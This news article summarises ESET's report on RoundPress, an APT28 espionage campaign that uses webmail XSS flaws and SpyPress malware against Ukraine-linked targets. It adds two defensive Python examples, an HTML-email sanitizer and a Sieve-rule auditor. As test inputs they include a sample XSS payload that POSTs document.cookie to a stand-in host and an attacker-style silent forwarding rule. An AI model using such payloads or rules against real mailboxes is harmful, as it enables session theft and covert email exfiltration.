ESET reports on RoundPress, a cyber espionage campaign by Russia’s Fancy Bear (Sednit) targeting Ukraine-related organizations through webmail vulnerabilities and SpyPress malware.
Cybersecurity researchers at ESET have revealed a sophisticated cyber espionage campaign, codenamed RoundPress, assessing with “medium confidence” that it is orchestrated by the Russian-backed Sednit group (aka APT28, Fancy Bear). The operation actively targets organizations linked to the ongoing war in Ukraine, aiming to exfiltrate confidential data from vulnerable webmail servers such as Roundcube.
The Sednit group, linked by the US Department of Justice to the 2016 Democratic National Committee (DNC) hack and tracked by Hackread.com in attacks on TV5Monde and WADA, has been using targeted spearphishing emails in the RoundPress campaign.
These emails exploit Cross-Site Scripting (XSS) vulnerabilities in various webmail platforms to inject malicious JavaScript code, dubbed SpyPress, into the victim’s browser. Because the script runs inside the victim’s already-authenticated webmail session, the attacker needs no credentials to read the mailbox.
Exploiting Known and Zero-Day Vulnerabilities in Webmail Systems
In ESET’s blog post, shared with Hackread.com, researchers noted that over the past two years, espionage groups have targeted webmail servers like Roundcube and Zimbra for email theft because many installations are outdated and their vulnerabilities can be triggered remotely, simply by sending a crafted email to a user of the server.
In 2023, researchers observed Sednit exploiting CVE-2020-35730 in Roundcube. In 2024, however, the campaign expanded to target vulnerabilities in:
- Horde (an older XSS flaw)
- Zimbra (CVE-2024-27443, often known as ZBUG-3730, patched on March 1, 2024)
- MDaemon (CVE-2024-11182, a zero-day reported by the researchers on November 1, 2024, and patched in version 24.5.1 on November 14, 2024)
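The mechanism behind every entry in that list is the same: the webmail client renders attacker-supplied HTML, and whatever survives its filtering runs in the victim's session. The following added example (written for this page, not code from ESET or from any of the webmail projects named, and unrelated to the specific CVEs above) shows why a "strip the script tags" filter is not a defence and what an allowlist-based sanitizer looks like. The email body, the `c2.invalid` host and the tag and attribute lists are constructed assumptions.

```python
"""Added example: naive HTML-email filtering vs an allowlist sanitizer.
Not taken from ESET's report or any webmail project; inputs are constructed."""
import html
import re
from html.parser import HTMLParser

# Constructed sample message carrying several injection vectors. None of them
# needs a <script> tag: an event handler, a javascript: link or an imported
# stylesheet fires as soon as the client renders the message.
SAMPLE_EMAIL_HTML = (
    '<p>Breaking news from Kharkiv</p>'
    '<img src="x" onerror="fetch(\'https://c2.invalid/\',{method:\'POST\',body:document.cookie})">'
    '<a href="javascript:alert(1)">read more</a>'
    '<svg><style>@import "https://c2.invalid/x.css"</style></svg>'
    '<script>alert(1)</script>'
)


def naive_strip_scripts(body):
    """The weak approach: delete <script> blocks and render the rest.
    Event handlers, javascript: URLs and <svg>/<style> pass straight through."""
    return re.sub(r"<script\b[^>]*>.*?</script\s*>", "", body, flags=re.I | re.S)


# Allowlist: anything not named here is dropped (the tag) or escaped (the text).
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "ul", "ol", "li",
                "div", "span", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}           # every other allowed tag keeps no attributes
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}
SAFE_HREF = re.compile(r"^(?:https?:|mailto:)", re.I)   # scheme allowlist, not denylist


class _Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)   # entities in text arrive decoded; we re-escape
        self.out = []
        self.skip = 0                             # >0 while inside a dropped element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1
            return
        if self.skip or tag not in ALLOWED_TAGS:
            return                                # unknown element: drop the tag, keep its text
        kept = []
        for name, value in attrs:                 # HTMLParser lowercases names, unescapes values
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue                          # covers every on* handler, style, src, ...
            value = (value or "").strip()
            if name == "href" and not SAFE_HREF.match(value):
                continue                          # javascript:, data:, vbscript:, &#106;avascript:
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip:
            self.out.append(html.escape(data, quote=False))


def sanitize_html_email(body):
    """Return a rendering-safe subset of the message body."""
    s = _Sanitizer()
    s.feed(body)
    s.close()
    return "".join(s.out)


if __name__ == "__main__":
    print("naive   :", naive_strip_scripts(SAMPLE_EMAIL_HTML))
    print("allowlist:", sanitize_html_email(SAMPLE_EMAIL_HTML))
```

The point of the allowlist is that it never has to know the attacker's trick: an attribute that is not explicitly permitted, a URL scheme that is not explicitly permitted and an element that is not explicitly permitted are all discarded by default, so the SVG, the event handler and the entity-encoded `javascript:` link fall out without being individually recognised.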
ESET noted a specific spearphishing email sent on September 29, 2023, from katecohen1984@portugalmail[.]pt exploiting CVE‑2023‑43770 in Roundcube. The emails typically mimic news content to entice victims into opening them, such as an email to a Ukrainian target on September 11, 2024, from kyivinfo24@ukr[.]net about an alleged arrest in Kharkiv, and another to a Bulgarian target on November 8, 2024, from office@terembg[.]com concerning Putin and Trump.
Primary Focus on Ukraine-Related Entities
The primary targets of Operation RoundPress in 2024, as identified through ESET telemetry and VirusTotal submissions, are predominantly Ukrainian governmental entities and defence companies in Bulgaria and Romania, some of which produce Soviet-era weapons for Ukraine.
Researchers also observed targeting of national governments in Greece, Cameroon, Ecuador, Serbia, and Cyprus (an academic in environmental studies), a telecommunications company serving the defence sector in Bulgaria, and a civil air transport company and a state transportation company in Ukraine.
The SpyPress malware variants (SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA) share obfuscation techniques and communicate with C2 servers via HTTP POST requests. Their capabilities vary, however.
For instance, SpyPress.ROUNDCUBE has been observed creating Sieve rules to forward all incoming emails to an attacker-controlled address, such as srezoska@skiff[.]com (Skiff being a privacy-oriented email service). SpyPress.MDAEMON demonstrated the ability to create App Passwords, granting persistent access that survives the victim closing the browser session the XSS ran in.
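A Sieve forwarding rule is persistence that outlives the XSS: it is stored server-side and keeps copying mail out after the malicious message is deleted. The following added example (written for this page, not ESET's or Roundcube's code) audits Sieve scripts for redirects to addresses outside the organisation, reporting whether the rule keeps a copy in the mailbox (`:copy`, so the victim notices nothing missing) and whether it sits at top level, i.e. applies to every message. The organisation domain, the sample scripts and the `skiff.invalid` address are constructed assumptions.

```python
"""Added example: flag Sieve scripts that silently forward mail off-domain.
Not from ESET or Roundcube; scripts and domains below are constructed."""
import re

ORG_DOMAINS = {"example.gov.ua"}        # assumption: the organisation's own mail domains

# Sieve (RFC 5228) forwards with `redirect "addr"`; the `:copy` tag (RFC 3894)
# leaves the original in the mailbox. Captures: optional tags, then the address.
REDIRECT_RE = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+"([^"]*)"', re.I)
COMMENT_RE = re.compile(r'#[^\n]*|/\*.*?\*/', re.S)
STRING_RE = re.compile(r'"(?:[^"\\]|\\.)*"')


def _strip_comments(script):
    # Blank out comments but keep newlines and length so offsets and line numbers hold.
    return COMMENT_RE.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), script)


def _brace_depth(code, pos):
    """0 means the action is not inside any `if {...}` block: it runs for every message.
    String contents are masked first so braces inside quoted text do not count."""
    masked = STRING_RE.sub(lambda m: '"' + "x" * (len(m.group()) - 2) + '"', code)
    head = masked[:pos]
    return head.count("{") - head.count("}")


def find_external_redirects(script, org_domains=ORG_DOMAINS):
    """Return one finding per redirect whose target domain is not one of ours."""
    code = _strip_comments(script)
    findings = []
    for m in REDIRECT_RE.finditer(code):
        tags, addr = m.group(1).lower(), m.group(2).strip()
        domain = addr.rsplit("@", 1)[-1].lower()
        if domain in org_domains:
            continue                         # internal forward: out of scope for this check
        findings.append({
            "address": addr,
            "keeps_copy": ":copy" in tags,   # stealthier: nothing disappears from the inbox
            "unconditional": _brace_depth(code, m.start()) == 0,
            "line": code.count("\n", 0, m.start()) + 1,
        })
    return findings


# Constructed samples: a legitimate internal filter and an attacker-style rule.
BENIGN_SCRIPT = '''require ["fileinto"];
# forward HR tickets to the shared mailbox
if header :contains "subject" "[HR]" {
    redirect "hr-desk@example.gov.ua";
}
'''

MALICIOUS_SCRIPT = '''require ["copy", "fileinto"];
# a decoy condition (note the brace inside the string), then a top-level forward
if header :contains "subject" "{never}" { fileinto "Junk"; }
redirect :copy "collector@skiff.invalid";
'''

if __name__ == "__main__":
    for name, script in (("benign", BENIGN_SCRIPT), ("malicious", MALICIOUS_SCRIPT)):
        print(name, find_external_redirects(script))
```

In a Dovecot-based deployment the scripts to feed this are the per-user `*.sieve` files under the Sieve storage directory (an assumption about the mail stack; Roundcube's managesieve plugin writes them through the ManageSieve service). An unconditional, `:copy` redirect to a free-mail or privacy-mail domain that the user did not create is exactly the artefact the article describes.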
Researchers concluded that the ongoing exploitation of webmail vulnerabilities by groups like Sednit underscores the importance of timely patching and strong security measures to protect sensitive information from such targeted spying campaigns.
J Stephen Kowski, Field CTO at SlashNext Email Security+, commented on the latest development, stating, “Attacks like Operation RoundPress show how quickly hackers can shift targets, especially when they find weaknesses in popular email platforms.”
“Whether you’re using paid commercial email systems or free, self-hosted open-source options like RoundCube, no solution is completely safe – self-hosted systems often give a false sense of security since they still need regular updates and expert maintenance,” he warned.
“The best way to stay ahead is by making sure email systems are always updated and patched, using strong protections like multi-factor authentication, and having tools that can spot and block phishing emails before they reach users,” Kowski advised.